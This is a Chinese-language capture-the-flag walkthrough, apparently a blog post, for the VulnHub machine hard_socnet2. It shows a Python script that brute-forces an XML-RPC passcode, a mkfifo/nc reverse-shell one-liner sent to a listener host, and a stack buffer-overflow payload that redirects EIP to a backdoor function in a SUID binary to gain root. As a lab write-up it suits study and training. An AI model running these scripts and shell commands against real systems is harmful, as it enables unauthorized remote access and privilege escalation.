第八次打靶-2

标签：lea esp 打靶 第八次 eax add ebp push

靶机介绍

1）靶机地址：https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova

2）靶机难度：高

3）打靶目标: 取得 root 权限

4）涉及攻击方法：主机发现、端口扫描、SQL注入、文件上传、蚁剑上线、CVE-2021-3493、XMLRPC、逆向工程、动态调试、缓冲区溢出、漏洞利用代码编写

5）课程来源：https://www.aqniukt.com/goods/show/2434?targetId=16289&preview=0

6）参考连接：https://docs.python.org/zh-cn/3/library/xmlrpc.html

打靶过程：

注：本次打靶过程以前面获得低权限的用户账号为前提进行提权，但不知道CVE-2021-3493该漏洞

1）信息搜集：查看用户文件，是否存在其他用户，简单查看后，发现一个socnet的可以登录的用户，可猜测为目标应用程序的管理用户

$ cat /etc/passwd |grep /bin/bash

2）信息搜集：查看到socnet用户加目录下存在三个文件。其中monitor.py是在web界面中看到的管理员留言的提到的文件，该脚本的作用是监视服务器的运行状态，且该脚本已经在服务器运行了

$ cd /home/socnet
$ pwd
$ ls
$ ps awx |grep monitor.py

3）查看monitor.py文件源码，阅读代码，查看该程序是否存在漏洞

cat monitor.py
#my remote server management API
import SimpleXMLRPCServer
import subprocess
import random

debugging_pass = random.randint(1000,9999)

def runcmd(cmd):                   #定义函数
    results = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)      #创建一个新的进程，来执行变量cmd,同时启用一个新的shell在其中执行cmd
    output = results.stdout.read() + results.stderr.read()
    return output

def cpu():
    return runcmd("cat /proc/cpuinfo")    #调用runcmd函数执行命令

def mem():
    return runcmd("free -m")

def disk():
    return runcmd("df -h")

def net():
    return runcmd("ip a")

def secure_cmd(cmd,passcode):
    if passcode==debugging_pass:         #随机数debugging_pass和passcode比较，cmd为自定义命令
         return runcmd(cmd)
    else:
        return "Wrong passcode."

server = SimpleXMLRPCServer.SimpleXMLRPCServer(("0.0.0.0", 8000))
server.register_function(cpu)
server.register_function(mem)
server.register_function(disk)
server.register_function(net)
server.register_function(secure_cmd)

server.serve_forever()

XMLRPC：可以利用xmlrpc在服务器端生成一个服务器端的API，该API可以接受客户端同样使用rpcxml的请求访问方式，访问服务器端的API

官网：https://docs.python.org/zh-cn/3/library/xmlrpc.html

4）通过编写客户端代码，使其连接服务端代码，根据服务端返回请求的判断结果进行暴力破解，破解出服务端代码中的passcode值

①先进行简单测试：通过脚本请求了服务端的cpu信息，服务端接受到cpu请求后，通过其API接口执行了客户端的请求，查询到了目标服务器CPU的信息

# cat a.py     
import xmlrpc.client
with xmlrpc.client.ServerProxy("http://192.168.56.112:8000/") as proxy:
    print(str(proxy.cpu()))

# python3 a.py

②修改客户端代码，通过暴力破解的方式，把服务器端的random随机生成的数字passcode破解出来

# cat b.py 
import xmlrpc.client
with xmlrpc.client.ServerProxy("http://192.168.56.112:8000/") as proxy:
    for p in range(1000,10000):
        r = str(proxy.secure_cmd('whoami',p))
        if not "Wrong" in r:
            print(p)
            print(r)
            break

# python3 b.py            

5）编写客户端代码，通过上一步暴力破解出的passcode值，使服务器执行自定义系统命令（此处为反弹shell命令）

①编写客户端代码

# cat a.py 
import xmlrpc.client
with xmlrpc.client.ServerProxy("http://192.168.56.112:8000/") as proxy:
    cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.56.103 4444 >/tmp/f"
    r = str(proxy.secure_cmd(cmd,7630))
    print(r)

②kali主机进行监听

# nc -lvvp 4444

③执行客户端脚本

# python3 a.py

④将反弹的shell进行一个简单升级,查看socnet用户家目录下文件信息 ，查看发现文件add_record是一个32位的可执行程序，而且该程序使用了suid和sgid权限

$ python -c "import pty;pty.spawn('/bin/bash')"
$ cd /home/socnet
$ ls -l
$ file add_record

peda是一个python gdb动态调试脚本，有许多方便的命令来帮助加速利用Linux/Unix上的开发过程。它也是编写自定义交互式python gdb命令，

思路：使用gdb来调试add_record程序，跟踪其内存使用情况，查看是否有内存溢出等问题

补充：漏洞挖掘本质：

​ 所有应用程序的漏洞挖掘方法原理都是一样的，一个web应用程序，防止在远端服务器，对其进行攻击、注入的具体方法是向这个程序所有的数据提交点提交一些异常的数据，让程序在处理这些payload时产生一些意想不到的异常，最终使得我们可以获取到一个反弹shell.

​ 如果面对的是一个本机上运行的普通的应用程序，针对该程序进行漏洞挖掘的思路和针对web应用程序漏洞挖掘的思路是一样的。首先，需要找到应用程序的攻击面（即向该程序数据提交的入口点），针对各个入口点，尝试payload的注入。

6）先对add_record程序进行漏洞挖掘，先需要知道该程序具有哪些数据提交的入口点

①先执行应用程序add_record，执行程序后，需要输入一些数据，输入的数据最后会生成在一个文件中

$ ./add_record

②再次执行应用程序，此处输入trouble数量为1，发现需要输入描述信息，同时本次添加的数据也会追加至employee_records.txt文件中

7）可以发现，name、worked、salary、trouble、explain都是可以提交数据的入口点，按个对上述入口点进行数据提交，测试是否存在内存溢出的漏洞

补充：gdb是一个程序的动态调试工具，通过该调试工具，可以跟踪和监视在程序在运行过程中计算机所有寄存器、堆栈、内存使用情况、函数调用的跟踪判断。发现在那次数据提交过程中，会造成内存数据的溢出。

$ gdb -q ./add_record
gdb-peda$ r                  #正式的去加载，执行程序，上一步只是程序被解释器所调用

内存溢出相应测试技巧：向每一个数据的提交位置，输入大量的A,通过这种方法去监视内存的变化，如果这个时候该变量存在缓存区漏洞，导致了内存溢出，覆盖到了其他的寄存器位置，那么就可以通过判断其他寄存器中的数据是否全是A，这种现象来判断注入的数据是否成功的溢出到了其他寄存器，进而通过进一步探测，成功的去利用及修改寄存器中具体位置的具体值来实现最终代码的加载执行

①先通过python生成500个A

# python -c "print('A'*500)"

②执行以后发现程序被退出了，没有发现任何的程序溢出的情况。可以初步判断，该位置并没有内存溢出漏洞

③按照上述方法，直到输入到explain变量时，看到堆栈中出现了大量的A,通过该显示，可以确定explain变量没有做内存范围的限定，导致500个A被溢出，覆盖到了内存中其他的位置，导致堆栈中出现了大量的A

​ 注：在缓存区溢出漏洞中，需重点关注ELP寄存器，因为ELP寄存器中保存的数据，是CPU接下来要去运行的下一条指令所对应的内存地址的编号，所以需要判断出，ELP中对应的AAAA是500个A中的具体哪几个A。当判断出ELP中的4个A在500个A中的具体位置，就可以知道，当注入第多少个字符时，字符会被精准的覆盖到ELP寄存器中，然后就可在该位置放置payload程序所对应的内存地址，然后去执行反弹shell，获取目标系统最高权限

④逐渐缩小，注入的字符的数量个数，发现注入100个A时，同样会造成溢出

# python -c "print('A'*100)"

⑤生成一串特征字符，帮助我们去识别AAAA在500个字符的哪个位置（每4个字符都不相同）

$ pattern create 100

⑥通过gdb调试工具，自动去识别AHAA在具体哪个位置，可以发现EIP寄存器的偏移量位置为62，即从63个字符开始，就会进入到EIP寄存器中

$ pattern search

⑦生成62个占位符，并生成一串字符，确定BCDE会被注入到EIP寄存器中

# python -c "print('A'*62 + 'BCDE')"

8）此时可精准的向EIP寄存器中写入我们想要写入的任何数据，此时

①发现漏洞具体过程：先对应用程序进行了汇编代码的查看

$ disas main

补充：一个程序执行时，CPU会对其分配内存地址，在内存地址中加载指令、存放数据，进行数据的处理，再把运算的结果输出

Dump of assembler code for function main:
   0x080486d8 <+0>:	lea    ecx,[esp+0x4]
   0x080486dc <+4>:	and    esp,0xfffffff0
   0x080486df <+7>:	push   DWORD PTR [ecx-0x4]
   0x080486e2 <+10>:	push   ebp
   0x080486e3 <+11>:	mov    ebp,esp
   0x080486e5 <+13>:	push   edi
   0x080486e6 <+14>:	push   esi
   0x080486e7 <+15>:	push   ebx
   0x080486e8 <+16>:	push   ecx
   0x080486e9 <+17>:	sub    esp,0xa8
   0x080486ef <+23>:	call   0x80485b0 <__x86.get_pc_thunk.bx>
   0x080486f4 <+28>:	add    ebx,0x1654
   0x080486fa <+34>:	mov    DWORD PTR [ebp-0xac],0x414e
   0x08048704 <+44>:	lea    edx,[ebp-0xa8]
   0x0804870a <+50>:	mov    eax,0x0
   0x0804870f <+55>:	mov    ecx,0x18
   0x08048714 <+60>:	mov    edi,edx
   0x08048716 <+62>:	rep stos DWORD PTR es:[edi],eax
   0x08048718 <+64>:	sub    esp,0x8
   0x0804871b <+67>:	lea    eax,[ebx-0x13ee]
   0x08048721 <+73>:	push   eax
   0x08048722 <+74>:	lea    eax,[ebx-0x13ec]
   0x08048728 <+80>:	push   eax
   0x08048729 <+81>:	call   0x8048520 <fopen@plt>   //调用函数，fopen表示打开文件，@plt表示是内嵌函数，显示程序欢迎提示信息
   0x0804872e <+86>:	add    esp,0x10
   0x08048731 <+89>:	mov    DWORD PTR [ebp-0x1c],eax
   0x08048734 <+92>:	sub    esp,0xc
   0x08048737 <+95>:	lea    eax,[ebx-0x13d4]
   0x0804873d <+101>:	push   eax
   0x0804873e <+102>:	call   0x80484e0 <puts@plt>   //
   0x08048743 <+107>:	add    esp,0x10
   0x08048746 <+110>:	sub    esp,0xc
   0x08048749 <+113>:	lea    eax,[ebx-0x137c]
   0x0804874f <+119>:	push   eax
   0x08048750 <+120>:	call   0x8048480 <printf@plt>       //call表示函数调用，表示输入用户名
   0x08048755 <+125>:	add    esp,0x10
   0x08048758 <+128>:	mov    eax,DWORD PTR [ebx-0x4]
   0x0804875e <+134>:	mov    eax,DWORD PTR [eax]
   0x08048760 <+136>:	sub    esp,0x4
   0x08048763 <+139>:	push   eax
   0x08048764 <+140>:	push   0x19
   0x08048766 <+142>:	lea    eax,[ebp-0x39]
   0x08048769 <+145>:	push   eax
   0x0804876a <+146>:	call   0x80484b0 <fgets@plt>
   0x0804876f <+151>:	add    esp,0x10
   0x08048772 <+154>:	sub    esp,0xc
   0x08048775 <+157>:	lea    eax,[ebx-0x1366]
   0x0804877b <+163>:	push   eax
   0x0804877c <+164>:	call   0x8048480 <printf@plt>   //输入工作年限
   0x08048781 <+169>:	add    esp,0x10
   0x08048784 <+172>:	sub    esp,0x8
   0x08048787 <+175>:	lea    eax,[ebp-0x40]
   0x0804878a <+178>:	push   eax
   0x0804878b <+179>:	lea    eax,[ebx-0x1352]
   0x08048791 <+185>:	push   eax
   0x08048792 <+186>:	call   0x8048540 <__isoc99_scanf@plt>
   0x08048797 <+191>:	add    esp,0x10
   0x0804879a <+194>:	sub    esp,0xc
   0x0804879d <+197>:	lea    eax,[ebx-0x134f]
   0x080487a3 <+203>:	push   eax
   0x080487a4 <+204>:	call   0x8048480 <printf@plt>   #输入工资
   0x080487a9 <+209>:	add    esp,0x10
   0x080487ac <+212>:	sub    esp,0x8
   0x080487af <+215>:	lea    eax,[ebp-0x44]
   0x080487b2 <+218>:	push   eax
   0x080487b3 <+219>:	lea    eax,[ebx-0x1352]
   0x080487b9 <+225>:	push   eax
   0x080487ba <+226>:	call   0x8048540 <__isoc99_scanf@plt>
   0x080487bf <+231>:	add    esp,0x10
   0x080487c2 <+234>:	sub    esp,0xc
   0x080487c5 <+237>:	lea    eax,[ebx-0x1340]
   0x080487cb <+243>:	push   eax
   0x080487cc <+244>:	call   0x8048480 <printf@plt> #输入
   0x080487d1 <+249>:	add    esp,0x10
   0x080487d4 <+252>:	sub    esp,0x8
   0x080487d7 <+255>:	lea    eax,[ebp-0x48]
   0x080487da <+258>:	push   eax
   0x080487db <+259>:	lea    eax,[ebx-0x1352]
   0x080487e1 <+265>:	push   eax
   0x080487e2 <+266>:	call   0x8048540 <__isoc99_scanf@plt>
   0x080487e7 <+271>:	add    esp,0x10
   0x080487ea <+274>:	call   0x80484a0 <getchar@plt>
   0x080487ef <+279>:	mov    DWORD PTR [ebp-0x20],eax
   0x080487f2 <+282>:	cmp    DWORD PTR [ebp-0x20],0xa
   0x080487f6 <+286>:	je     0x80487fe <main+294>
   0x080487f8 <+288>:	cmp    DWORD PTR [ebp-0x20],0xffffffff
   0x080487fc <+292>:	jne    0x80487ea <main+274>
   0x080487fe <+294>:	mov    eax,DWORD PTR [ebp-0x48]
   0x08048801 <+297>:	cmp    eax,0x1
   0x08048804 <+300>:	jne    0x804883c <main+356>
   0x08048806 <+302>:	sub    esp,0xc
   0x08048809 <+305>:	lea    eax,[ebx-0x1317]
   0x0804880f <+311>:	push   eax
   0x08048810 <+312>:	call   0x8048480 <printf@plt>
   0x08048815 <+317>:	add    esp,0x10
   0x08048818 <+320>:	sub    esp,0xc
   0x0804881b <+323>:	lea    eax,[ebp-0xac]
   0x08048821 <+329>:	push   eax
   0x08048822 <+330>:	call   0x8048490 <gets@plt>
   0x08048827 <+335>:	add    esp,0x10
   0x0804882a <+338>:	sub    esp,0xc
   0x0804882d <+341>:	lea    eax,[ebp-0xac]
   0x08048833 <+347>:	push   eax
   0x08048834 <+348>:	call   0x80486ad <vuln>   //调用自定义函数vuln
   0x08048839 <+353>:	add    esp,0x10
   0x0804883c <+356>:	sub    esp,0xc
   0x0804883f <+359>:	lea    eax,[ebx-0x130d]
   0x08048845 <+365>:	push   eax
   0x08048846 <+366>:	call   0x80484e0 <puts@plt>
   0x0804884b <+371>:	add    esp,0x10
   0x0804884e <+374>:	mov    ecx,DWORD PTR [ebp-0x48]
   0x08048851 <+377>:	mov    edx,DWORD PTR [ebp-0x44]
   0x08048854 <+380>:	mov    eax,DWORD PTR [ebp-0x40]
   0x08048857 <+383>:	sub    esp,0x8
   0x0804885a <+386>:	lea    esi,[ebp-0xac]
   0x08048860 <+392>:	push   esi
   0x08048861 <+393>:	push   ecx
   0x08048862 <+394>:	push   edx
   0x08048863 <+395>:	push   eax
   0x08048864 <+396>:	lea    eax,[ebp-0x39]
   0x08048867 <+399>:	push   eax
   0x08048868 <+400>:	lea    eax,[ebx-0x12ec]
   0x0804886e <+406>:	push   eax
   0x0804886f <+407>:	call   0x8048480 <printf@plt>
   0x08048874 <+412>:	add    esp,0x20
   0x08048877 <+415>:	mov    ecx,DWORD PTR [ebp-0x48]
   0x0804887a <+418>:	mov    edx,DWORD PTR [ebp-0x44]
   0x0804887d <+421>:	mov    eax,DWORD PTR [ebp-0x40]
   0x08048880 <+424>:	sub    esp,0x4
   0x08048883 <+427>:	lea    esi,[ebp-0xac]
   0x08048889 <+433>:	push   esi
   0x0804888a <+434>:	push   ecx
   0x0804888b <+435>:	push   edx
   0x0804888c <+436>:	push   eax
   0x0804888d <+437>:	lea    eax,[ebp-0x39]
   0x08048890 <+440>:	push   eax
   0x08048891 <+441>:	lea    eax,[ebx-0x12ec]
   0x08048897 <+447>:	push   eax
   0x08048898 <+448>:	push   DWORD PTR [ebp-0x1c]
   0x0804889b <+451>:	call   0x8048510 <fprintf@plt>
   0x080488a0 <+456>:	add    esp,0x20
   0x080488a3 <+459>:	sub    esp,0xc
   0x080488a6 <+462>:	push   DWORD PTR [ebp-0x1c]
   0x080488a9 <+465>:	call   0x80484c0 <fclose@plt>
   0x080488ae <+470>:	add    esp,0x10
   0x080488b1 <+473>:	mov    eax,0x0
   0x080488b6 <+478>:	lea    esp,[ebp-0x10]
   0x080488b9 <+481>:	pop    ecx
   0x080488ba <+482>:	pop    ebx
   0x080488bb <+483>:	pop    esi
   0x080488bc <+484>:	pop    edi
   0x080488bd <+485>:	pop    ebp
   0x080488be <+486>:	lea    esp,[ecx-0x4]
   0x080488c1 <+489>:	ret    
End of assembler dump.

②使用下断点的方式，对汇编代码进行调试

gdb-peda$ break *0x0804873d      #地址前需要加*
gdb-peda$ r
gdb-peda$ s         #s表示单步执行，每次执行一个CPU的指令

下图表示，下一步将执行call执行

单步执行，发现堆栈中数据发生了变化，显示了程序第一次执行时，所显示的信息

③删除断点,重新设置断点

gdb-peda$ del 1
gdb-peda$ break *0x0804877b
gdb-peda$ r

逐个按照上述方法，可以理清程序逻辑

9）根据上述代码分析，发现了一个自定义的vuln函数，根据函数名称，查看该函数具体的功能

①先查看当前应用程序，所有的函数（包括内嵌函数和自定义函数）

gdb-peda$ info func
0x080484f0  system@plt
0x08048500  __libc_start_main@plt
0x08048510  fprintf@plt
0x08048520  fopen@plt
0x08048530  setuid@plt
0x08048676  backdoor
0x080486ad  vuln
0x080486d8  main

system函数：用于执行操作系统的某些指令

setuid函数：说明该程序中，调用了setuid函数,申请了系统权限，结合前面add_record程序就具备suid权限，说明就是通过该函数调用了系统权限

②查看vuln函数中，执行了哪些指令：发现在vuln函数中，又调用了strcpy这个操作系统内嵌函数

gdb-peda$ disas vuln

③对strcpy这个操作系统内嵌函数搜索发现，该函数历史版本存在已知漏洞：因strcpy函数存在缓存区溢出漏洞，又因自定义函数vuln函数调用了strcpy函数函数，导致应用程序存在漏洞

④查看backdoor函数：发现该函数调用了setuid函数和system函数

gdb-peda$ disas backdoor

⑤对backdoor函数进行跟踪，先取得该函数起始位置的内存地址，再将该地址写入ELP寄存器中，即可直接运行backdoor函数，再跟踪到该函数中的system指令到底执行了哪些系统命令

10）因主程序中只执行了vuln函数，而vuln函数又会调用存在缓冲区溢出漏洞的strcpy内嵌函数，但是主函数中没有直接调用backdoor函数，所有必须利用主程序中加载的vuln函数，利用缓冲区漏洞，向EIP寄存器中写入backdoor函数的起始内存加载地址，使其执行backdoor函数，进而执行system函数中的操作系统指令

注意事项：如下图所示，在EIP寄存器中存放的字符BCDE对应的16进制数值时，发现地址是倒叙排列的，即B=42、C=43、D=44、E=45,但是地址为0x45444343

所以要想把backdoor函数的起始位置的内存地址写入到EIP寄存器，需要按照颠倒的方式写入，根据前面查看，backdoor函数的起始地址为0x08048676

①利用python生成程序需要输入的字符

# python -c "import struct; print('zdz\n1\n1\n1\n' + 'A'*62 + struct.pack('I',0x08048676))" >payload

②在目标主机，生成payload文件

socnet@socnet2:~$ python -c "import struct; print('zdz\n1\n1\n1\n' + 'A'*62 + struct.pack('I',0x08048676))" >payload

③将payload文件一次性的输入给应用程序

socnet@socnet2:~$ gdb -q ./add_record
gdb-peda$ r < payload

程序执行发现，最后执行了/bin/dash和/bin/bash

11)对vuln函数设置断点，将payload加载到程序中，一直通过s更进，当一直出现backdoor函数具体执行system函数时进行停止

gdb-peda$ q
socnet@socnet2:~$ gdb -q ./add_record
gdb-peda$ break vuln
gdb-peda$ r < payload
gdb-peda$ s

12）将peyload全部加载只应用程序中，获取到root权限

socnet@socnet2:~$ cat payload - | ./add_record

13）可以使用反弹shell的方式在kali获得一个界面相对友好的shell

kail:
	# nc -lvvp 3333
目标主机shell:
	rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.56.103 3333 >/tmp/f

标签：lea,esp,打靶,第八次,eax,add,ebp,push
From： https://www.cnblogs.com/piaolaipiaoqu/p/16978013.html